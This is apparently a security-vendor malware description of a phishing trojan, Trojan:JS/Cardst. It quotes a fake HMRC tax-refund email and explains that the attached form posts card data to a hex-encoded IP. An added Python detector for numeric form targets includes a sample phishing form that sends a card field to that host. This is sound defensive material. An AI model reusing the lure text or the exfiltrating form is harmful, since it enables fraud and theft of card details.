Threat behavior
Trojan:JS/Cardst is a detection for trojan JavaScript embedded in an HTML file attached to an e-mail message. The HTML attachment is used for phishing: it contains a form for entering credit card information and a submit button that sends the collected data to a specific server.
Installation
This trojan script is embedded within HTML and may arrive as an unsolicited e-mail message purporting to be from HM Revenue & Customs (HMRC). Below is an example message:
From: <customers@hmrc.gov.uk>
Date: 10/22/2009 1:54:48 PM
Subject: Please Submit Your Payment Refund.
Attachment: Refund-form.html
Dear Applicant:
We have reviwed your tax return and our calculations of your last years accounts a tax refund of 178.25 is due
Please submit the tax refund request and allow us 3-6 days in order to
process it.
A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying after the deadline.
Please submit the form attached to your email in order to complete your tax refund
Best Regards,
HM Revenue & Customs
--------------------------------------------------------------
© Copyright 2009, HM Revenue & Customs UK All rights reserved.
TAX REFUND ID: A29R119
Payload
Sends data to remote server
When a user opens the attached HTML form, it is displayed in a Web browser with fields for entering credit card and personal information and a button labeled "Submit Information". When the user enters data and clicks the button, the form field data is posted to the website "0x4010d38f" (64.16.211.143). At the time of this writing, the site was unavailable.
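The form target above is written as a single hexadecimal integer, 0x4010d38f, which browsers resolve to 64.16.211.143. The following added example (not part of the original analysis) shows one way to scan an HTML attachment for forms that post to numerically encoded hosts; it goes beyond the single-integer case to cover dotted hex, octal and short forms as well. The sample HTML, its /submit path and all function names are constructed for illustration.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

_PART = re.compile(r"0x[0-9a-f]+|[0-9]+")

def loose_ipv4(host):
    """Dotted-quad for a host written the way browsers accept IPv4 (1-4 parts,
    each hex, octal or decimal), or None if the host is not numeric."""
    parts = host.lower().split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.fullmatch(p) for p in parts):
        return None
    try:
        nums = [int(p, 16) if p.startswith("0x")
                else int(p, 8) if len(p) > 1 and p[0] == "0"
                else int(p) for p in parts]
    except ValueError:  # e.g. "09" is not valid octal
        return None
    *head, last = nums
    # Leading parts are one byte each; the last part fills the remaining bytes.
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last + sum(n << (8 * (3 - i)) for i, n in enumerate(head))
    return str(ipaddress.IPv4Address(value))

class FormActions(HTMLParser):
    """Collects the action attribute of every <form> tag."""
    def __init__(self):
        super().__init__()
        self.actions = []
    def handle_starttag(self, tag, attrs):
        action = dict(attrs).get("action")
        if tag == "form" and action:
            self.actions.append(action)

def numeric_form_targets(html):
    """Return (action, host, normalized_ip) for forms posting to a numeric host."""
    parser = FormActions()
    parser.feed(html)
    hosts = ((a, urlsplit(a).hostname) for a in parser.actions)
    return [(a, h, loose_ipv4(h)) for a, h in hosts if h and loose_ipv4(h)]

# Constructed sample attachment: only the host value comes from the write-up.
SAMPLE_HTML = """<form method="post" action="http://0x4010d38f/submit">
<input name="card"><input type="submit" value="Submit Information"></form>
<form action="https://www.example.org/contact"></form>"""

if __name__ == "__main__":
    for action, host, ip in numeric_form_targets(SAMPLE_HTML):
        print(f"form posts to numeric host {host} -> {ip} ({action})")
```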
Additional Information
HMRC is an England-based entity responsible for collecting direct or indirect taxes and revenue. Users who fill in the attached form and submit the information could be at risk of financial loss.
Analysis by Hong Jia
Prevention